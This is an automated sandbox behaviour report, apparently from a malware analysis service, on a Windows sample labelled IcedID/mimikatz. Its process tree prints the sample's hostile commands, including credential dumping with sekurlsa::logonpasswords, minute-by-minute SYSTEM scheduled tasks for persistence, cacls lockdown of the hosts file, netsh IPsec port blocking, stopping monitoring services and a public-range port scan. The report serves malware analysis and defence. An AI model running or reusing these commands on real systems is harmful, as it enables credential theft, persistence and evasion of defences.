opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ewqksq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kjezifarc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4356 cmd.exe 4944 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023c61-6.dat nsis_installer_2 behavioral2/files/0x0007000000023c7d-14.dat nsis_installer_1 behavioral2/files/0x0007000000023c7d-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ucdremr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ucdremr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ucdremr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ucdremr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ucdremr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ucdremr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump htmcbbltr.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ ucdremr.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4944 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1556 schtasks.exe 2496 schtasks.exe 3008 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2512 2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2512 2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4388 ucdremr.exe Token: SeDebugPrivilege 3896 ucdremr.exe Token: SeDebugPrivilege 2764 vfshost.exe Token: SeDebugPrivilege 4256 htmcbbltr.exe Token: SeLockMemoryPrivilege 3596 vktncb.exe Token: SeLockMemoryPrivilege 3596 vktncb.exe Token: SeDebugPrivilege 1688 htmcbbltr.exe Token: SeDebugPrivilege 4548 htmcbbltr.exe Token: SeDebugPrivilege 4868 htmcbbltr.exe Token: SeDebugPrivilege 4696 htmcbbltr.exe Token: SeDebugPrivilege 2404 htmcbbltr.exe Token: SeDebugPrivilege 4172 htmcbbltr.exe Token: SeDebugPrivilege 4432 htmcbbltr.exe Token: SeDebugPrivilege 228 htmcbbltr.exe Token: SeDebugPrivilege 2476 htmcbbltr.exe Token: SeDebugPrivilege 4156 htmcbbltr.exe Token: SeDebugPrivilege 2144 htmcbbltr.exe Token: SeDebugPrivilege 4028 htmcbbltr.exe Token: SeDebugPrivilege 2356 htmcbbltr.exe Token: SeDebugPrivilege 32 htmcbbltr.exe Token: SeDebugPrivilege 4848 htmcbbltr.exe Token: SeDebugPrivilege 2780 htmcbbltr.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2512 2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe 2512 2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe 4388 ucdremr.exe 4388 ucdremr.exe 3896 ucdremr.exe 3896 ucdremr.exe 2224 xohudmc.exe 4304 ewqksq.exe 1220 ucdremr.exe 1220 ucdremr.exe 4364 ucdremr.exe 4364 ucdremr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2512 wrote to memory of 4356 2512 2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe 83 PID 2512 wrote to memory of 4356 2512 2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe 83 PID 2512 wrote to memory of 4356 2512 2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe 83 PID 4356 wrote to memory of 4944 4356 cmd.exe 85 PID 4356 wrote to memory of 4944 4356 cmd.exe 85 PID 4356 wrote to memory of 4944 4356 cmd.exe 85 PID 4356 wrote to memory of 4388 4356 cmd.exe 87 PID 4356 wrote to memory of 4388 4356 cmd.exe 87 PID 4356 wrote to memory of 4388 4356 cmd.exe 87 PID 3896 wrote to memory of 2996 3896 ucdremr.exe 89 PID 3896 wrote to memory of 2996 3896 ucdremr.exe 89 PID 3896 wrote to memory of 2996 3896 ucdremr.exe 89 PID 2996 wrote to memory of 3812 2996 cmd.exe 91 PID 2996 wrote to memory of 3812 2996 cmd.exe 91 PID 2996 wrote to memory of 3812 2996 cmd.exe 91 PID 2996 wrote to memory of 3368 2996 cmd.exe 92 PID 2996 wrote to memory of 3368 2996 cmd.exe 92 PID 2996 wrote to memory of 3368 2996 cmd.exe 92 PID 3896 wrote to memory of 1120 3896 ucdremr.exe 94 PID 3896 wrote to memory of 1120 3896 ucdremr.exe 94 PID 3896 wrote to memory of 1120 3896 ucdremr.exe 94 PID 2996 wrote to memory of 4248 2996 cmd.exe 96 PID 2996 wrote to memory of 4248 2996 cmd.exe 96 PID 2996 wrote to memory of 4248 2996 cmd.exe 96 PID 2996 wrote to memory of 740 2996 cmd.exe 97 PID 2996 wrote to memory of 740 2996 cmd.exe 97 PID 2996 wrote to memory of 740 2996 cmd.exe 97 PID 2996 wrote to memory of 3412 2996 cmd.exe 98 PID 2996 wrote to memory of 3412 2996 cmd.exe 98 PID 2996 wrote to memory of 3412 2996 cmd.exe 98 PID 2996 wrote to memory of 2888 2996 cmd.exe 99 PID 2996 wrote to memory of 2888 2996 cmd.exe 99 PID 2996 wrote to memory of 2888 2996 cmd.exe 99 PID 3896 wrote to memory of 1000 3896 ucdremr.exe 102 PID 3896 wrote to memory of 1000 3896 ucdremr.exe 102 PID 3896 wrote to memory of 1000 3896 ucdremr.exe 102 PID 3896 wrote to memory of 5000 3896 ucdremr.exe 104 PID 3896 wrote to memory of 5000 3896 ucdremr.exe 104 PID 3896 wrote to memory of 5000 3896 ucdremr.exe 104 PID 3896 wrote to memory of 4664 3896 ucdremr.exe 117 PID 3896 wrote to memory of 4664 3896 ucdremr.exe 117 PID 3896 wrote to memory of 4664 3896 ucdremr.exe 117 PID 4664 wrote to memory of 1908 4664 cmd.exe 119 PID 4664 wrote to memory of 1908 4664 cmd.exe 119 PID 4664 wrote to memory of 1908 4664 cmd.exe 119 PID 1908 wrote to memory of 1960 1908 wpcap.exe 120 PID 1908 wrote to memory of 1960 1908 wpcap.exe 120 PID 1908 wrote to memory of 1960 1908 wpcap.exe 120 PID 1960 wrote to memory of 4492 1960 net.exe 122 PID 1960 wrote to memory of 4492 1960 net.exe 122 PID 1960 wrote to memory of 4492 1960 net.exe 122 PID 1908 wrote to memory of 4008 1908 wpcap.exe 123 PID 1908 wrote to memory of 4008 1908 wpcap.exe 123 PID 1908 wrote to memory of 4008 1908 wpcap.exe 123 PID 4008 wrote to memory of 3764 4008 net.exe 125 PID 4008 wrote to memory of 3764 4008 net.exe 125 PID 4008 wrote to memory of 3764 4008 net.exe 125 PID 1908 wrote to memory of 1984 1908 wpcap.exe 126 PID 1908 wrote to memory of 1984 1908 wpcap.exe 126 PID 1908 wrote to memory of 1984 1908 wpcap.exe 126 PID 1984 wrote to memory of 4680 1984 net.exe 128 PID 1984 wrote to memory of 4680 1984 net.exe 128 PID 1984 wrote to memory of 4680 1984 net.exe 128 PID 1908 wrote to memory of 1220 1908 wpcap.exe 129
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1788
-
C:\Windows\TEMP\stfvitvtn\vktncb.exe"C:\Windows\TEMP\stfvitvtn\vktncb.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3596
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-15_e8c184f5e781b33090f2fb3c904e4e54_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\yjyimgrn\ucdremr.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4944
-
-
C:\Windows\yjyimgrn\ucdremr.exeC:\Windows\yjyimgrn\ucdremr.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4388
-
-
-
C:\Windows\yjyimgrn\ucdremr.exeC:\Windows\yjyimgrn\ucdremr.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3812
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:3368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4248
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3412
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2888
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1120
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1000
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5000
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\rbqcumykk\ctftbtnzv\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\rbqcumykk\ctftbtnzv\wpcap.exeC:\Windows\rbqcumykk\ctftbtnzv\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4492
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:3764
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:4680
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:1220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1592
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4336 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4944 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4876
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:624 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:908
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\rbqcumykk\ctftbtnzv\kjezifarc.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\rbqcumykk\ctftbtnzv\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:4784 -
C:\Windows\rbqcumykk\ctftbtnzv\kjezifarc.exeC:\Windows\rbqcumykk\ctftbtnzv\kjezifarc.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\rbqcumykk\ctftbtnzv\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\rbqcumykk\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\rbqcumykk\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:1516 -
C:\Windows\rbqcumykk\Corporate\vfshost.exeC:\Windows\rbqcumykk\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tccekrbmv" /ru system /tr "cmd /c C:\Windows\ime\ucdremr.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4792 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tccekrbmv" /ru system /tr "cmd /c C:\Windows\ime\ucdremr.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rjdrnginb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\yjyimgrn\ucdremr.exe /p everyone:F"2⤵PID:4956
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "rjdrnginb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\yjyimgrn\ucdremr.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nbltcmccc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stfvitvtn\vktncb.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3916 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nbltcmccc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stfvitvtn\vktncb.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3008
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2232
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4724
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1156
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1960
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2072
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4332
-
-
